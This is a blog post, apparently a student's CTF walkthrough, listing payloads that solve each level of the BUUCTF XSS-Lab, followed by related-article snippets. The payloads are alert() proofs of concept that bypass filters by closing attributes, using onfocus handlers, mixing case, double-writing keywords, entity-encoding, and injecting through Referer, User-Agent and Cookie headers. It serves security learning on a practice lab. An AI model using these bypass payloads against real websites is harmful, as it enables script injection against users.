【Buuctf】XSS-Lab

于 2024-08-05 16:12:51 发布
阅读量713 收藏 6
点赞数 1
文章标签: xss 前端 java 安全架构 web安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75354817/article/details/140920879
版权

1.name=<script>alert(1)</script>

2.x"><script>alert(1)</script>

3.' οnfοcus=javascript:alert(123) >
value参数用单引号包裹,用burp看的更清晰;input标签内用onfocus+伪协议

4." οnfοcus=javascript:alert(123) >

5."><a href="javascript:alert(`xss`);">xss</a>
把on变为o_n

6."><a hRef="javascript:alert(`xss`);">xss</a>
检查on和href,但是没有检查大小写

7."><a hrhrefef="javascrscriptipt:alert(`xss`);">xss</a>
删除href,script。双写绕过

8.javasc&#114;ipt:alert(1)
目标是将伪协议写入,检查script,部分字母unicode编码绕过

9.javasc&#114;ipt:alert(`http://`)
检测到http://才会插入到链接中,直接把http://设为弹出语句

10.keyword=123&t_sort="%20type=text%20οnfοcus="alert(1)
只有t_sort能写入数据,且删除了尖括号。首先把value闭合,然后type=text把input变为输入框,后面再来个双引号闭合value剩下的双引号

11.数据包中添加:referer:" type=text OnfOcus="alert(123)
sort处虽然能传数据,但是过滤了尖括号、双引号,没什么办法。t_ref会捕获数据包中referer的值,会删除javascript,过滤小写的o

12.数据包将UA头改为" type=text OnfOcus="alert(123)

13.数据包添加Cookie: user=" type=text OnfOcus="alert(123)
注意c大写。为什么是user?不知道

14.题目有误

15.网上的解法?src='level1.php?name=<img src=1 οnerrοr=alert(1)>'
源代码中用到了ng-include,思路是包含一个页面,让图片出错,然后弹窗。但是一直做不出来

16.?keyword=<img%0asrc="x"%0aοnerrοr=alert("xss");>
过滤了空格,用/代替也不行,用%0a、%0D可以
比较奇怪的是,我怎么知道他会接收参数keyword。。。

42fourtytoo
关注
XSS-lab通关记录
zjnu_y3s的博客
04-11 2250
本文章为buuctf basic XSS-lab的通关记录,为个人学习记录,仅供参考 在学习xss-lab之前,先了解了一下xss攻击的原理,如下: 简述 人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。 跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则.
xss-labs 1-15
m0_65977612的博客
11-11 670
BUU XSS-Lab 1-15
BUUCTF刷题 XSS-Lab
weixin_54438700的博客
07-21 1212
alert("XSS")>level 1中的JS代码alert("XSS")level 1中的JS代码alert("XSS")
BUUCTF[第二章 web进阶]XSS闯关
2301_78136321的博客
09-26 688
alert(1)</script>进行常规XSS注入。首先使用<script>alert(1)
XSS-LabXSS注入笔记1-16)
小谢的博客
10-29 5069
XSS-LabXSS注入笔记1-16)
XSS学习 xss-Lab题解
qq_61768489的博客
02-12 2481
level 1 没有任何防护,直接url传xss name=<script>alert(1)</script> level2 有个input标签,尝试用"> 闭合标签 (在网页源代码中,我们输入的数据,是在表单中的value属性内,所以需要先闭合input标签,然后在注入代码,闭合标签) "><script>alert(1)</script> level 3 测试发现尖括号被转换字...
xss-lab全通关教程
05-07
XSS-lab的20个关卡中,你将依次接触这些类型,并学习如何构造有效的XSS payload,以及如何利用各种过滤和转义机制来绕过防护。例如,你可能会遇到如何在URL参数、表单提交或者cookies中隐藏和传递XSS payload的...
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
XSS攻击-xss-lab(1-10)详细讲解
qq_43395215的博客
05-06 9343
xss概述 ​ XSS,全称跨站脚本,XSS跨站脚本(Cross-Site Scripting,XSS(与css-层叠样式表冲突,所以命名为xss)),某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要注意的是,XSS不仅仅扩展JavaScript,还包括flash等其他脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存...
CTF之XSS浅谈(xsslabs)
glass_york的博客
10-07 743
主要针对XSS入门和XSSLABS前7关挑战
xss-labs详解(上)1-10
hxhxhxhxx的博客
08-02 1177
xss-labs详解Level 1Level 2htmlspecialcharsLevel 3Level 4Level 5Level 6Level 7Level 8Level 9LevelLevelLevelLevel Level 1 源码 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-
BUUCTF[第二章Web进阶]XSS闯关教程
DMXA的博客
11-01 716
攻击方式:这种攻击多见于论坛、博客和留言板,攻击者在发帖的过程中,将恶意代码连同正常信息一起注入帖子的内容中。当目标用户访问该链接时,服务器接收该目标用户的请求并进行处理,然后服务器把带有XSS代码的数据发送给目标用户的浏览器,浏览器解析这段带有XSS代码的恶意脚本后,就会触发XSS漏洞。存储型XSS又称为持久型XSS,攻击脚本将被永久的放在目标服务器的数据库或文件中,具有很高的隐蔽性。DOM型XSS其实是一种特殊的反射型XSS,它基于DOM文档对象模型的一种漏洞。(3)DOM型XSS
XSS靶场之xss-lab(1-5)关卡笔记
Yoo的博客
07-12 1567
文章目录(一)XSS(二)xss-lab(三)关卡笔记第一关第二关第三关第四关第五关 (一)XSS (XSS)跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,xss漏洞大多数是寻找参数未过滤的输出函数。 (二)xss-lab 靶场下载地址:https://github.com/lysha
XSS-lab靶场(11~15)
bin789456的博客
05-26 355
Level 11 <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; $str00 = $_GET["t_sort"]; $str11=$_SERVER['HTTP_REFERER']; $str22=str_replace(">","",$str11); $str33=str_replace("<","",$str22); echo "<h2 align=center>没有找到和".htmlspecial
BUUCTF XSS闯关1
最新发布
m0_74167420的博客
04-18 1982
使用'1闭合后面的单引号,当然也可以使用"//"将其注释,最终 username = alert(1);这段代码是一个简单的JavaScript脚本,其中包含一个alert函数调用,用于显示一个弹出框,内容为"xss"。javascript:alert(1),浏览器会把javascript后面的内容当做代码执行,直接在当前页面执行。所以执行:autosubmit=1&action=JavaScript:alert(1);
【CTF练习】BUU XSS COURSE 1(XSS获取cookie登录)
m0_73866435的博客
02-28 2458
有两个尝试点。
自建XSS平台与BUUCTF[GWCTF 2019]mypassword
qq_41755084的博客
08-09 429
从这里创建网站,将xss平台文件拷贝到phpstudy平台安装目录的www目录下,然后在根目录里设定为xss平台文件所在的目录。这里就需要后台机器人先在两个输入框里输入账号密码,然后把这两个值存入cookie,然后读取其中的一个值,这个利用条件我感觉有点苛刻,但是不管,先试试再说。接下来需要将本地的xss平台服务映射到有公网ip的服务器上,这样靶机访问公网ip的服务器时就相当于访问本地的xss平台,完成攻击目的。启动后,访问目标服务器的7500端口,输入展示板的账号密码,应该就可以看到frp服务的展板了。
XSS-Lab第十关
07-27
XSS-Lab的第十关是一个注入漏洞的挑战。根据引用\[2\],XSS-Lab是一个用于学习XSS注入的平台,每一关都有不同的XSS注入漏洞。在第十关中,与上一关不同的是会加入地址的检查。具体来说,该关会检查输入的数据中是否...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值